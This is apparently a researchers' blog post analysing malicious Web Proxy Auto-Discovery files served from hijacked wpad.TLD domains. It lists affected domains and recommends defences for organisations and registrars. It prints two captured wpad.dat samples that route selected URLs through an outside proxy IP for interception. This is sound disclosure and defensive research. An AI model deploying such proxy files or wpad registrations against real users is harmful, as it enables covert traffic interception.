The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part III


Some weeks ago I (Jacopo Cor­betta) and Luca Inv­ernizzi wrote about a curi­ous Man-In-The-Middle poten­tial attack explot­ing flaws in the Web Proxy Auto­matic Dis­cov­ery (WPAD) and DNS pro­to­cols. Long story short, if you reg­is­ter a wpad.domain name you might be able to per­form a very stealthy Man-In-The-Middle attack. Now, DNS is com­pli­cated and pro­grams are buggy, so hijack­ing a wpad.Top-Level-Domain name like wpad.com (or wpad.it or (!) wroclaw.pl) could expose a lot of com­put­ers to your attack.

You might recall that I was puz­zled by the con­tent of wpad.it/wpad.dat and won­dered what Ital­ian sites were tar­geted. Then Luca pointed out it was reg­is­tered by a pol­ish guy, and that he iden­ti­fied one of the pos­si­ble tar­gets as systempartnerski.pl.

We had in mind to run some analy­sis and then alert the reg­is­trars before post­ing again, but since the WPAD topic got atten­tion on Bug­Traq yes­ter­day it may be more timely to pub­lish our results now.

UPDATE: The wpad.dat served by the pol­ish guy changed! It appears they removed the site iden­ti­fied by Luca! The file was still in the orig­i­nal form when we reported our find­ings to the Ital­ian secu­rity mail­ing list sikurezza.org (see this mes­sage posted on 21/05, Alessan­dro posted our results on 18/05). This thing is get­ting inter­est­ing... Any­way, here’s the new file:

function FindProxyForURL(url, host) {
        //regular expressions supported?
        if ( shExpMatch(url, "http*//*g*ad*nd*c*m*sh*ds*js") ) return "PROXY 72.55.164.182:80";
        return "DIRECT";
}

Hunt­ing for WPAD exploits

As we wrote before, the only reli­able list of effec­tive top level domains is the one used in the Mozilla code, pub­licly main­tained at publicsuffix.org. Each of these domains — if reg­is­tered — could hide a mali­cious wpad.dat with poten­tially wide reach.

We think security-conscious DNS reg­is­trars should deny any request for these names — regard­less of whether the under­ly­ing WPAD vul­ner­a­bil­ity is wide­spread or not, we should do every­thing in our power to reduce the attack potential.

In our first ran­dom probes, we found the same strange wpad.dat on wpad.it, wpad.cz and wpad.pl But then we got curi­ous: how com­mon is this prob­lem? How many wpad.dats are found in the wild? So I wrote a small python script which attempted to resolve all wpad.tld names and to retrieve the asso­ci­ated wpad.tld/wpad.dats.

The TLD menace

There are some­thing like 3370 top-level-domains in the publicsuffix.org list. 122 wpad.top-level-domain are actu­ally reg­is­tered and return an IP address. 62 of them return data when asked for a wpad.dat over HTTP.

11 of those wpad.dats look like generic “domain park­ing” pages. I am not com­pletely sure, since I don’t speak all those lan­guages. Here’s the list:

.ar.com
.cm
.gouv.rw
.ph
.st
.tv
.cg
.co.st
.kiev.ua
.rw
.tk

The wpad.cn/wpad.dat and wpad.net.ua/wpad.dat also look like some kind of redi­rect pages. This brings the total of innocu­ous1 domains to 13.

The wpad domains for Switzer­land and Liecht­en­stein (.ch and .li) return a “neu­tral” wpad.dat (that is, no proxy for any URL). For .tsaritsyn.ru and .volgograd.ru an empty file is returned. I don’t know if this means that the wpad domain name was claimed by some good guy (like the one who reg­is­tered wpad.com, for exam­ple). To be com­pletely sure we would need to per­form the query from Switzer­land or Rus­sia.2

The wpad.dats for vn.ua, ptz.ru and karelia.ru look quite com­pli­cated and might even be legit­i­mate prox­y­ing attempts by a regional ISP. Addi­tional inves­ti­ga­tion would be required. Here are the files.

The remain­ing 42 wpad domains were serv­ing exactly the same wpad.dat file (now they have changed it! See our update on top) (indented for clarity):

function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || 
             (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && 
             !shExpMatch(url, "http*//*n*o.*")) ) 
        { 
                return "PROXY 72.55.164.182:80; DIRECT";
        }
        return "DIRECT";
}

All of these domains look have prob­a­bly been reg­is­tered by the same guy (even if WHOIS records are incon­clu­sive). The whois for wpad.pl even has his name (don’t know if it is accu­rate, though, so we’ll avoid post­ing names). Here is the list of affected domains:

.asia
.at
.be
.bialystok.pl
.biz.pl
.bydgoszcz.pl
.cc
.co.at
.com.es
.com.pl
.com.tw
.cz
.edu.pl
.es
.in
.it
.katowice.pl
.name
.net.cn
.net.in
.net.pl
.nom.es
.olsztyn.pl
.opole.pl
.org.cn
.org.es
.org.in
.org.pl
.org.tw
.pl
.radom.pl
.ro
.rzeszow.pl
.sk
.slask.pl
.szczecin.pl
.tw
.warszawa.pl
.waw.pl
.wroclaw.pl
.ws
.zgora.pl

As you can see, our friend has been able to grab the global wpad domain for 12 coun­tries includ­ing Poland, Italy, Spain, Aus­tria, Bel­gium, the Czech Repub­lic, Roma­nia and India.

Final thoughts and mysteries

The most obvi­ous rec­om­men­da­tion is that you reg­is­ter wpad.yourdomain.com in your orga­ni­za­tion DNS (e.g. since our beloved school has sssup.it and we admin­is­trate the allievi.sssup.it sub­do­main, we have asso­ci­ated wpad.allievi.sssup.it with a mean­ing­less IP and we’ll rec­om­mend the net­work staff to do the same with wpad.sssup.it). This will imme­di­ately stop the search for a wpad.dat by your clients.

We would also rec­om­mend reg­is­trars to delete wpad.domain entries or at least to avoid accept­ing new ones. As time allows (the exam ses­sion is near!) we’ll bring this mat­ter to the atten­tion of the reg­is­trar admins, let’s hope they lis­ten to us. If some­one with a big name is read­ing this (cool!), you might wish to con­tact some DNS authorities.

While Luca cracked the sec­ond wild­card expres­sion (http*//*s*st*mp*tn*sk*p*), we still have no idea about which sites are tar­geted by the first one (http://*g*ad*nd*c*m*sh*ds*js, maybe a JavaScript file?). And why did they use such a wide exclu­sion pat­tern (http*//*n*o.*) in the orig­i­nal file? Also, the proxy isn’t work­ing for us — maybe they are answer­ing only to IPs in Poland?

Now that some days ago the pol­ish guys changed their wpad.dat we won­der what should be our next move... and what will be their next move! We’ll post updates here, so stay tuned.

  1. The wpad.dat file has to be in a spe­cial Java-Script like for­mat, see findproxyforurl.com for details []
  2. The wpad.ch server might be serv­ing a harm­less wpad.dat to for­eign hunters and a mali­cious one to domes­tic vic­tims (of course, this applies to all domains in this list — with the pos­si­ble excep­tion of Italy, our home coun­try) []

, , , ,

  • Guest

    thanks

    proxy privacyblock.info

    john

  • Sono

    ??????????? where is the way to nav­i­gate as an Ital­ian Web Surfer ???